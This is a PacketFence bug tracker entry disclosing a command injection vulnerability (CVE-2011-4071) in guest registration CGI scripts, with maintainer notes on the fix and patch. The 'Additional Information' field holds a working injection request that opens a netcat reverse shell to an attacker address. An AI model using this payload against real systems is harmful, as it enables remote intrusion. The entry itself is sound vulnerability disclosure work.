PacketFence
Bug Tracking System

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0001295PacketFencesecuritypublic2011-10-03 12:132011-10-24 20:17
Reportermattd 
Assigned Toobilodeau 
PrioritynormalSeveritymajorReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Versiondevel 
Target Version3.0.2Fixed in Version3.0.2 
Summary0001295: Command injection in guest management and captive portal web interfaces
DescriptionIn both the guest management (html/admin/guest-management.cgi) and captive portal (html/captive-portal/guest-selfregistration.cgi) web interfaces, shell command lines are constructed using several session parameters, which are then passed to the pf_run function for execution. However, these are not escaped, allowing an attacker to execute arbitrary commands on the system.

The existence of this vulnerability in the guest management interface would not normally be such an issue, however the authentication bypass described in bug 1294 allows the vulnerability to be exposed by an attacker for exploitation.
Additional InformationA sample request, triggering the injection and making the server create a reverse shell to the attacker listening on 192.168.1.1:1234 (assuming netcat is installed on the server):
guest-selfregistration.cgi?mode=guest-register&by_email=1&firstname=%22%27%3bnc%20-c%27sh%202%3E%261%27%20192.168.1.1%201234%20%23&lastname=x&email=x@example.com&phone=1&aup_signed=1
TagsNo tags attached.
fixed in git revision
fixed in mtn revision92f9741dafd035ed1617b8ebb8d6a467cb0f1edb
Attached Filespatch file icon security-fix-1295-command-injection.patch [^] (9,249 bytes) 2011-10-13 13:44 [Show Content]

- Relationships
related to 0001308closedobilodeau guest access by sms doesn't record firstname, lastname 

-  Notes
(0002342)
obilodeau (reporter)
2011-10-13 13:56

Fixed command injection by doing parametrized SQL instead of calling pfcmd person command. While I was there, I fixed a problem with SMS activation where username and lastname were not properly kept (0001308).

Some potentially dangerous characters could still be injected in the SQL-based person creation mechanism so I made sure to sanitize the output in the Web Admin to prevent XSS there:
- Converting dangerous characters into HTML entities in the Web Admin's tableprint
- Converting dangerous characters into HTML entities in the Web Admin's person edit dialog

I haven't re-validated all of the admin because it's a lot of work and most of the other areas (except person) are not directly controlled by user input or are validated.

Fix will be released in 3.0.2 shortly.

Those you can't wait or who won't upgrade in a timely fashion should apply the attached patch. It should apply cleanly on 3.0+. Users of PacketFence before version 3.0.0 are *not* affected.
(0002366)
obilodeau (reporter)
2011-10-17 10:40

This vulnerability has been assigned: CVE-2011-4071.
(0002383)
obilodeau (reporter)
2011-10-24 20:15

fix released in 3.0.2

- Issue History
Date Modified Username Field Change
2011-10-03 12:13 mattd New Issue
2011-10-06 11:47 obilodeau Status new => assigned
2011-10-06 11:47 obilodeau Assigned To => obilodeau
2011-10-13 13:44 obilodeau File Added: security-fix-1295-command-injection.patch
2011-10-13 13:56 obilodeau mtn revision => 92f9741dafd035ed1617b8ebb8d6a467cb0f1edb
2011-10-13 13:56 obilodeau Note Added: 0002342
2011-10-13 13:56 obilodeau Status assigned => resolved
2011-10-13 13:56 obilodeau Fixed in Version => +1
2011-10-13 13:56 obilodeau Resolution open => fixed
2011-10-13 13:57 obilodeau Relationship added related to 0001308
2011-10-17 10:40 obilodeau Note Added: 0002366
2011-10-24 16:45 obilodeau View Status private => public
2011-10-24 20:15 obilodeau Target Version => 3.0.2
2011-10-24 20:15 obilodeau Note Added: 0002383
2011-10-24 20:16 obilodeau Status resolved => closed
2011-10-24 20:17 obilodeau Fixed in Version +1 => 3.0.2


Copyright © 2000 - 2012 MantisBT Group
Powered by Mantis Bugtracker